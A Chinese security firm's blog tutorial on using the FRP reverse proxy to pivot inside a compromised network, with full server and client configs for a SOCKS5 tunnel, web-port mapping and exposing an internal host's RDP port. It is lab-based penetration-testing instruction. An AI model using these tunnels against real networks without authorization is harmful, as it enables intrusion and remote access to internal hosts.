业务讲堂
技术研究
最新文章
内网学习 | FRP代理
作者:管理员 发表日期:2021/03/17 来源:原创

FRP


FRP(Fast Reverse Proxy) 是一款简单,好用,稳定的隧道工具。frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

 

 

一、使用FRP建立隧道


获得了一个位于内网的通过NAT方式对外提供服务的主机的权限,现在我们需要对其所在的内网继续进行渗透。于是,我们就需要通过FRP建立一个隧道,让我们的主机可以通过隧道访问其内网。

 

本机IP192.168.1.25
web服务器IP192.168.193.132  内网NAT IP :192.168.52.143
内网主机IP192.168.52.141

 

服务端


我们的主机作为服务端,服务端启动:frps.exe -c frps.ini ,服务端的配置 frps.ini 如下(操作过程中把注释中文去掉,避免出现错误)

[common]
bind_addr = 0.0.0.0        #绑定的ip,为本机
bind_port = 10000          #绑定的端口
dashboard_addr = 0.0.0.0   #管理地址
dashboard_port = 17000     #管理端口
dashboard_user = root      #管理的用户名
dashboard_pwd  = Roderick    #管理用户的密码
token = Roderick777             #客户端服务端连接的密码
heartbeat_timeout = 90     #心跳超时时间
max_pool_count = 3         #最大同时连接数 

图片.png

 

客户端


web服务器作为客户端,客户端启动:frpc.exe -c frpc.ini ,客户端的配置文件 frpc.ini 如下

[common]
server_addr = 192.168.1.25
server_port = 10000           #服务器绑定的端口
token = Roderick777                #连接的密码
pool_count = 3        
protocol = tcp                #协议类型
health_check_type = tcp
health_check_interval_s = 100
[test]
remote_port = 10001           #代理的端口
plugin = socks5               #使用的协议
use_encryption = true         #是否加密
use_compression = true
plugin_user= admin             #socks5用户名
plugin_passwd= Roderick           #socks5密码

图片.png


访问 http://192.168.1.25:17000 root Roderick 登录 查看TCP,成功搭建隧道

图片.png


使用proxifier设置全局代理,输入socks5 账号密码 admin Roderick 。成功扫描内网主机。

图片.png

 

图片.png


二、使用FRP映射Web服务


服务端


我们的主机作为服务端,服务端启动:frps.exe -c frps.ini ,服务端的配置 frps.ini 如下(操作过程中把注释中文去掉,避免出现错误)

[common]
bind_addr = 0.0.0.0        #绑定的ip,为本机
bind_port = 10000          #绑定的端口
dashboard_addr = 0.0.0.0   #管理地址
dashboard_port = 17000     #管理端口
dashboard_user = root      #管理的用户名
dashboard_pwd  = Roderick    #管理用户的密码
token = Roderick777             #客户端服务端连接的密码
heartbeat_timeout = 90     #心跳超时时间
max_pool_count = 3         #最大同时连接数


客户端


位于内网的主机作为客户端,客户端启动:frpc.exe -c frpc.ini ,客户端的配置文件 frpc.ini 如下:

[common]
server_addr = 192.168.1.25
server_port = 10000           #服务器绑定的端口
token = Roderick               #连接的密码

[HTTP test]
type=tcp
local_ip = 127.0.0.1          #本地ip地址
local_port = 80               #要映射的本地端口
remote_port = 80              #要映射的服务端端口
custom_domains=www.httptest.com  

 

访问 http://192.168.1.25:17000 root Roderick 登录 查看TCP,成功搭建隧道

图片.png


成功将内网80端口映射到主机IP:192.168.1.25的80端口

图片.png


 

三、使用FRP映射3389端口


我们获得了位于内网的一台主机的权限。他的3389端口只对内网开放,现在我们需要将该主机的3389端口映射到我们的主机的3389端口,那样,我们连接我们主机的3389端口就相当于连接内网主机的3389端口了。


服务端


位于主机:192.168.1.25 作为服务端,服务端启动:frps.exe -c frps.ini ,服务端的配置 frps.ini 如下:

[common]
bind_addr = 0.0.0.0        #绑定的ip,为本机
bind_port = 10000          #绑定的端口
dashboard_addr = 0.0.0.0   #管理地址
dashboard_port = 17000     #管理端口
dashboard_user = root      #管理的用户名
dashboard_pwd  = Roderick    #管理用户的密码
token = Roderick777             #客户端服务端连接的密码
heartbeat_timeout = 90     #心跳超时时间
max_pool_count = 3         #最大同时连接数


客户端


位于内网的主机作为客户端,客户端启动:frpc.exe -c frpc.ini ,客户端的配置文件 frpc.ini 如下:

[common]
server_addr = 192.168.1.25
server_port = 10000
token = Roderick777
[test]
type=tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 3389

 

访问 http://192.168.1.25:17000 root Roderick 登录 查看,成功搭建隧道

图片.png


 

 

 

 

天磊卫士|专注网络安全服务

咨询热线:400-654-0108

官网:https://www.uguardsec.com

分支机构:深圳、海口、北京、青岛、汕尾、上海

漏洞扫描|整改加固|渗透测试|APP安全评估|安全运维

系统入网|上线安全评估|代码审计|应急响应|应急演练


上一篇:SRC实战 | 某edu通用管理系统测试
下一篇:内网学习 | 手把手教你安装CS